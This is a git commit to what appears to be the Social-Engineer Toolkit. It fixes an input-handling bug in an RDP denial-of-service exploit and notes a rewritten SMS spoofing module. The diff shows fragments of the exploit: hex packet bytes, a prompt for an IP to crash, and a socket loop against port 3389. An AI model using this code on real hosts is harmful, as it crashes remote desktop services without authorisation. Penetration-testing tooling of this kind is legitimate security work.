fix string error in rdpdos exploit

This commit is contained in:
TrustedSec 2016-07-20 21:16:19 -04:00
parent f9d3f75872
commit 6840b5c253
2 changed files with 2 additions and 1 deletions
readme
src/fasttrack/exploits

View file

@ -4,6 +4,7 @@ version 7.3
* completely rewrote the SMS spoofing module from scratch to use spoofmytextmessage.com which the folks over there are super helpful and provided an undocumented API to be used within SET. This now works great and has been extensively tested.
* sped up the load process when using the main menu system the loading would pull from github each time the show_banner() function was called - this only loads once per SET load now
* fixed a string integer error from input to raw_input in the RDP DOS use after free in exploits
~~~~~~~~~~~~~~~~
version 7.2.3

View file

@ -24,7 +24,7 @@ dafree = "0300000802f08028".decode('hex')
trololo = headpack + dafuq + dafree
#HOSTNYO = sys.argv[1]
HOSTNYO = input("Enter the IP address to crash (remote desktop): ")
HOSTNYO = raw_input("Enter the IP address to crash (remote desktop): ")
PORTNYO = 3389
for i in range(10240):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)